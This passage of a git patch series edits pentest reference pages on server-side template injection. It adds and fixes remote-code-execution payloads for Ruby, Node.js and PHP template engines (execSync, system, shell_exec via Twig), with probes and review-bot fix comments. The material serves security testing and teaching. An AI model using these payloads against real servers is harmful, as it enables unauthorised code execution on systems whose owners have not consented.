New Code Injection and SSTI Techniques - Vladislav Korchagin - January 03, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md) - [A Pentester's Guide to Server Side Template Injection (SSTI) - Busra Demir - December 24, 2020](https://www.cobalt.io/blog/a-pentesters-guide-to-server-side-template-injection-ssti) - [Gaining Shell using Server Side Template Injection (SSTI) - David Valles - August 22, 2018](https://medium.com/@david.valles/gaining-shell-using-server-side-template-injection-ssti-81e29bb8e0f9) - [Template Engines Injection 101 - Mahmoud M. Awali - November 1, 2024](https://medium.com/@0xAwali/template-engines-injection-101-4f2fe59e5756) 
diff --git a/Server Side Template Injection/Ruby.md b/Server Side Template Injection/Ruby.md index d7c2615ff9..1d742f416d 100644 --- a/Server Side Template Injection/Ruby.md +++ b/Server Side Template Injection/Ruby.md @@ -5,6 +5,7 @@ ## Summary - [Templating Libraries](#templating-libraries) +- [Universal Payloads](#universal-payloads) - [Ruby](#ruby) - [Ruby - Basic injections](#ruby---basic-injections) - [Ruby - Retrieve /etc/passwd](#ruby---retrieve-etcpasswd) @@ -15,14 +16,27 @@ ## Templating Libraries | Template Name | Payload Format | -| ------------ | --------- | -| Erb | `<%= %>` | -| Erubi | `<%= %>` | -| Erubis | `<%= %>` | -| HAML | `#{ }` | -| Liquid | `{{ }}` | -| Mustache | `{{ }}` | -| Slim | `#{ }` | +|---------------|----------------| +| Erb | `<%= %>` | +| Erubi | `<%= %>` | +| Erubis | `<%= %>` | +| HAML | `#{ }` | +| Liquid | `{{ }}` | +| Mustache | `{{ }}` | +| Slim | `#{ }` | + +## Universal Payloads + +Generic code injection payloads work for many Ruby-based template engines, such as Erb, Erubi, Erubis, HAML and Slim. + +To use these payloads, wrap them in the appropriate tag. + +```ruby +%x('id') # Rendered RCE +File.read("Y:/A:/"+%x('id')) # Error-Based RCE +1/(system("id")&&1||0) # Boolean-Based RCE +system("id && sleep 5") # Time-Based RCE +``` ## Ruby @@ -74,3 +88,4 @@ Execute code using SSTI for **Slim** engine. ## References - [Ruby ERB Template Injection - Scott White & Geoff Walton - September 13, 2017](https://web.archive.org/web/20181119170413/https://www.trustedsec.com/2017/09/rubyerb-template-injection/) +- [Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 03, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md) From abbbf2fc95def1a82d6c4f87c772dbe405c7e199 Mon Sep 17 00:00:00 2001 
From: vladko312 Date: Sat, 3 Jan 2026 18:43:24 +0300 Subject: [PATCH 2/5] SSTI: - Fixed NodeJS payloads --- Server Side Template Injection/JavaScript.md | 12 +++++++----- 1 file changed, 7 insertions(+), 5 deletions(-) diff --git a/Server Side Template Injection/JavaScript.md b/Server Side Template Injection/JavaScript.md index f317f735bf..4568a7197c 100644 --- a/Server Side Template Injection/JavaScript.md +++ b/Server Side Template Injection/JavaScript.md @@ -41,17 +41,17 @@ To use these payloads, wrap them in the appropriate tag. ```javascript // Rendered RCE -require("child_process").execSync("id") +global.process.mainModule.require("child_process").execSync("id") // Error-Based RCE -require("Y:/A:/"+require("child_process").execSync("id")) -""["x"][require("child_process").execSync("id")] +global.process.mainModule.require("Y:/A:/"+global.process.mainModule.require("child_process").execSync("id")) +""["x"][global.process.mainModule.require("child_process").execSync("id")] // Boolean-Based RCE -[""][0 + !(require("child_process").spawnSync("id", options={shell:true}).status===0)]["length"] +[""][0 + !(global.process.mainModule.require("child_process").spawnSync("id", options={shell:true}).status===0)]["length"] // Time-Based RCE -require("child_process").execSync("id && sleep 5") +global.process.mainModule.require("child_process").execSync("id && sleep 5") ``` NunjucksJS is also capable of executing these payloads using `{{range.constructor(' ... ')()}}`. @@ -149,6 +149,8 @@ ${= _.VERSION} ## Pug +> Universal payloads also work for Pug. + [Official website](https://pugjs.org/api/getting-started.html) > From 09a5f07345201adda5cd35c339e23979b293c2bc Mon Sep 17 00:00:00 2001 
From: vladko312 Date: Sat, 3 Jan 2026 22:20:19 +0300 Subject: [PATCH 3/5] SSI, SSTI: - Improved MarkDown --- Server Side Include Injection/README.md | 2 +- Server Side Template Injection/Java.md | 2 +- Server Side Template Injection/PHP.md | 1 + Server Side Template Injection/README.md | 12 ++++++------ 4 files changed, 9 insertions(+), 8 deletions(-) diff --git a/Server Side Include Injection/README.md b/Server Side Include Injection/README.md index 5880147ec8..9826857903 100644 --- a/Server Side Include Injection/README.md +++ b/Server Side Include Injection/README.md @@ -11,7 +11,7 @@ ## Tools -- [vladko312/SSTImap](https://github.com/vladko312/SSTImap) - Automatic SSTI detection tool with interactive interface based on [epinna/tplmap](https://github.com/epinna/tplmap), supports SSI detection and exploitation with `--legacy` or `-e SSI` +* [vladko312/SSTImap](https://github.com/vladko312/SSTImap) - Automatic SSTI detection tool with interactive interface based on [epinna/tplmap](https://github.com/epinna/tplmap), supports SSI detection and exploitation with `--legacy` or `-e SSI` ```bash python3 ./sstimap.py -u 'https://example.com/page?name=John' --legacy -s diff --git a/Server Side Template Injection/Java.md b/Server Side Template Injection/Java.md index 2bd3c48441..f261d791d2 100644 --- a/Server Side Template Injection/Java.md +++ b/Server Side Template Injection/Java.md @@ -54,7 +54,7 @@ ### Java EL - Basic Injection -> Java has multiple Expression Languages using similar syntax. +Java has multiple Expression Languages using similar syntax. > Multiple variable expressions can be used, if `${...}` doesn't work try `#{...}`, `*{...}`, `@{...}` or `~{...}`. diff --git a/Server Side Template Injection/PHP.md b/Server Side Template Injection/PHP.md index 299bbc18a2..11caee80a3 100644 --- a/Server Side Template Injection/PHP.md +++ b/Server Side Template Injection/PHP.md 
@@ -167,6 +167,7 @@ $output = $twig > render ( ``` With certain settings, Twig interrupts rendering, if any errors or warnings are raised. This payload works fine in these cases: + ```php {{ {'id':'shell_exec'}|map('call_user_func')|join }} ``` diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md index 5d7e34a2e9..1b0b4af792 100644 --- a/Server Side Template Injection/README.md +++ b/Server Side Template Injection/README.md 
@@ -53,9 +53,9 @@ Original research: -- Rendered, Time-Based: [Server-Side Template Injection: RCE For The Modern Web App - James Kettle - August 05, 2015](https://portswigger.net/knowledgebase/papers/serversidetemplateinjection.pdf) -- Polyglot-Based: [Improving the Detection and Identification of Template Engines for Large-Scale Template Injection Scanning - Maximilian Hildebrand - September 19, 2023](https://www.hackmanit.de/images/download/thesis/Improving-the-Detection-and-Identification-of-Template-Engines-for-Large-Scale-Template-Injection-Scanning-Maximilian-Hildebrand-Master-Thesis-Hackmanit.pdf) -- Error-Based, Boolean-Based: [Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 03, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md) +* Rendered, Time-Based: [Server-Side Template Injection: RCE For The Modern Web App - James Kettle - August 05, 2015](https://portswigger.net/knowledgebase/papers/serversidetemplateinjection.pdf) +* Polyglot-Based: [Improving the Detection and Identification of Template Engines for Large-Scale Template Injection Scanning - Maximilian Hildebrand - September 19, 2023](https://www.hackmanit.de/images/download/thesis/Improving-the-Detection-and-Identification-of-Template-Engines-for-Large-Scale-Template-Injection-Scanning-Maximilian-Hildebrand-Master-Thesis-Hackmanit.pdf) +* Error-Based, Boolean-Based: [Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 03, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md) #### Rendered @@ -117,7 +117,7 @@ ${{<%[%'"}}%\. Common tags to test for SSTI with code evaluation: -``` +```powershell {{ ... }} ${ ... } #{ ... } 
@@ -133,13 +133,13 @@ ${ ... } Rendered SSTI can be checked by using mathematical expressions inside the tags: -``` +```powershell 7 * 7 ``` Error-Based SSTI can be checked by using this payload inside the tags: -``` +```powershell (1/0).zxy.zxy ``` From bec6524774724cbe859f0aab1f24491961f9e520 Mon Sep 17 00:00:00 2001 From: vladko312 Date: Sat, 3 Jan 2026 23:19:26 +0300 Subject: [PATCH 4/5] SSTI: - Fixed NodeJS payloads --- Server Side Template Injection/JavaScript.md | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/Server Side Template Injection/JavaScript.md b/Server Side Template Injection/JavaScript.md index 4568a7197c..8e8d861c64 100644 --- a/Server Side Template Injection/JavaScript.md +++ b/Server Side Template Injection/JavaScript.md @@ -41,17 +41,17 @@ To use these payloads, wrap them in the appropriate tag. ```javascript // Rendered RCE -global.process.mainModule.require("child_process").execSync("id") +global.process.mainModule.require("child_process").execSync("id").toString() // Error-Based RCE -global.process.mainModule.require("Y:/A:/"+global.process.mainModule.require("child_process").execSync("id")) -""["x"][global.process.mainModule.require("child_process").execSync("id")] +global.process.mainModule.require("Y:/A:/"+global.process.mainModule.require("child_process").execSync("id").toString()) +""["x"][global.process.mainModule.require("child_process").execSync("id").toString()] // Boolean-Based RCE [""][0 + !(global.process.mainModule.require("child_process").spawnSync("id", options={shell:true}).status===0)]["length"] // Time-Based RCE -global.process.mainModule.require("child_process").execSync("id && sleep 5") +global.process.mainModule.require("child_process").execSync("id && sleep 5").toString() ``` NunjucksJS is also capable of executing these payloads using `{{range.constructor(' ... ')()}}`. From 08b5c4c868fd4a8f5ac02f91ec276e953e3b1ca0 Mon Sep 17 00:00:00 2001 
From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sat, 3 Jan 2026 22:50:37 +0100 Subject: [PATCH 5/5] Unordered list style [Expected: dash; Actual: asterisk] --- Server Side Template Injection/README.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md index 1b0b4af792..e935fe6551 100644 --- a/Server Side Template Injection/README.md +++ b/Server Side Template Injection/README.md 
@@ -53,9 +53,9 @@ Original research: -* Rendered, Time-Based: [Server-Side Template Injection: RCE For The Modern Web App - James Kettle - August 05, 2015](https://portswigger.net/knowledgebase/papers/serversidetemplateinjection.pdf) -* Polyglot-Based: [Improving the Detection and Identification of Template Engines for Large-Scale Template Injection Scanning - Maximilian Hildebrand - September 19, 2023](https://www.hackmanit.de/images/download/thesis/Improving-the-Detection-and-Identification-of-Template-Engines-for-Large-Scale-Template-Injection-Scanning-Maximilian-Hildebrand-Master-Thesis-Hackmanit.pdf) -* Error-Based, Boolean-Based: [Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 03, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md) +- Rendered, Time-Based: [Server-Side Template Injection: RCE For The Modern Web App - James Kettle - August 05, 2015](https://portswigger.net/knowledgebase/papers/serversidetemplateinjection.pdf) +- Polyglot-Based: [Improving the Detection and Identification of Template Engines for Large-Scale Template Injection Scanning - Maximilian Hildebrand - September 19, 2023](https://www.hackmanit.de/images/download/thesis/Improving-the-Detection-and-Identification-of-Template-Engines-for-Large-Scale-Template-Injection-Scanning-Maximilian-Hildebrand-Master-Thesis-Hackmanit.pdf) +- Error-Based, Boolean-Based: [Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 03, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md) #### Rendered
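Review bot: `__include__` is not a Python builtin, so every line in the new "Universal Payloads" block of `Server Side Template Injection/Python.md` (PATCH 1/5, hunk `@@ -37,15 +38,28 @@`) raises `NameError` instead of running; the builtin that loads a module by name is `__import__`, so the block should read e.g. `__import__("os").popen("id").read()` and `1 / (__import__("os").popen("id")._proc.wait() == 0)`. Worth adding a short remark that `_proc` is a private attribute of the `os.popen` wrapper in CPython 3, since the Boolean-Based line (and the Jinja2 variant in hunk `@@ -220,6 +234,13 @@`) depends on it.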
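Review bot: the heading "Out of Bounds" in `Server Side Template Injection/README.md` (PATCH 1/5, hunk `@@ -32,15 +41,133 @@`, together with the Summary entry in hunk `@@ -1,15 +1,24 @@`) names the wrong concept: exposing results through a side channel such as a connection to an attacker-controlled server is conventionally called Out-of-Band (OOB), while "out of bounds" denotes memory access outside an array. Rename the heading, the Summary entry and the `#out-of-bounds` anchor to Out-of-Band. In the same hunk, the polyglot `${{<%[%'"}}%\.` is fenced as `ps1` although it is not PowerShell (use `text`), and it duplicates the polyglot already shown under "Inject Template Syntax" (visible as context of hunk `@@ -69,7 +196,7 @@`), so one of the two places should link to the other rather than repeat it.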
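Review bot: the Boolean-Based payload in the "Universal Payloads" block of `Server Side Template Injection/JavaScript.md` (PATCH 1/5, hunk `@@ -5,31 +5,56 @@`) passes `options={shell:true}`, which is an assignment to an undeclared identifier, not a named argument; in a strict-mode compiled template it throws `ReferenceError` and elsewhere it leaks a global, so `spawnSync("id", {shell:true})` is the intended call. The same line survives unchanged through PATCH 2/5 and PATCH 4/5. Also, the prose names Eta among the engines these payloads cover, but the "Templating Libraries" table above it has no Eta row; add one with its tag format.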
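Review bot: the new "Pug" section in `Server Side Template Injection/JavaScript.md` (PATCH 1/5, hunk `@@ -120,7 +145,26 @@`) has an empty blockquote line `>` right after the official-website link; it renders as a stray quote bar. Either fill it with a one-line description of Pug, as the other engine sections do, or drop the line.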
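Review bot: in the "Templating Libraries" table of `Server Side Template Injection/PHP.md` (PATCH 1/5, hunk `@@ -22,16 +23,43 @@`) the Latte row is changed from `{var $X=""}{$X}` to `{ }`, which loses the information that Latte prints an expression with `{=expr}` (or a variable with `{$var}`); a bare `{ }` is ambiguous because Latte parses the first word after `{` as a tag name. `{= }` would be consistent with the "Common tags" list added to the README in the same patch. In the "Universal Payloads" block below it, the comment on `ini_set("error_reporting", "1")` should say that the error still only reaches the response when `display_errors` is enabled, since `error_reporting` alone controls which errors are reported, not whether they are shown.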
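Review bot: the comments `// compatible v3, deprecated in v5` in the Smarty block of `Server Side Template Injection/PHP.md` (PATCH 1/5, hunk `@@ -52,8 +82,8 @@`) understate the change: Smarty 5 stopped exposing native PHP functions such as `system` to templates unless they are explicitly registered, so "removed in v5" or "requires registration in v5" is more accurate than "deprecated" and matches the "before v5" wording added above the section.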
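Review bot: the Twig additions in `Server Side Template Injection/PHP.md` (PATCH 1/5, hunk `@@ -109,6 +139,19 @@`) carry their explanations as trailing `// ...` text on the payload lines; Twig has no `//` comment syntax, so anyone copying a line gets the annotation rendered into the output, and the `php` fence language does not match Twig template syntax anyway. Move the annotations into prose or `{# ... #}` comments, and add the blank line before the second fence (PATCH 3/5 supplies the blank line but leaves the inline comments). Also, the sentence "With certain settings, Twig interrupts rendering, if any errors or warnings are raised." should drop the comma before "if".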
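Review bot: replacing `require` with `global.process.mainModule.require` in `Server Side Template Injection/JavaScript.md` (PATCH 2/5, hunk `@@ -41,17 +41,17 @@`) fixes the scope problem, but `process.mainModule` has been deprecated since Node 14 and is `undefined` when the application entry point is an ES module, so the payloads silently fail there. Add a one-line caveat after the block stating that dependency, the way the Pug section notes its reliance on `root.process`.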
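Review bot: tagging the template-tag list and the `7 * 7` / `(1/0).zxy.zxy` probes as `powershell` in `Server Side Template Injection/README.md` (PATCH 3/5, hunks `@@ -117,7 +117,7 @@` and `@@ -133,13 +133,13 @@`) gives markdownlint its required language but mislabels engine-agnostic snippets and triggers PowerShell highlighting on `{{ ... }}`; `text` satisfies the lint rule without implying a language. The `ps1` fence on the polyglot two blocks earlier should get the same treatment.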
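Review bot: the `.toString()` calls added in `Server Side Template Injection/JavaScript.md` (PATCH 4/5, hunk `@@ -41,17 +41,17 @@`) matter for the Rendered line, where some engines would otherwise print the Buffer's JSON form, but on the Error-Based lines the Buffer is already coerced to a string by `+` and by property-key conversion, so the change there is cosmetic; a comment explaining why the Rendered line needs it would help readers who trim the payload. The Boolean-Based line in this hunk still contains the `options={shell:true}` assignment noted on PATCH 1/5.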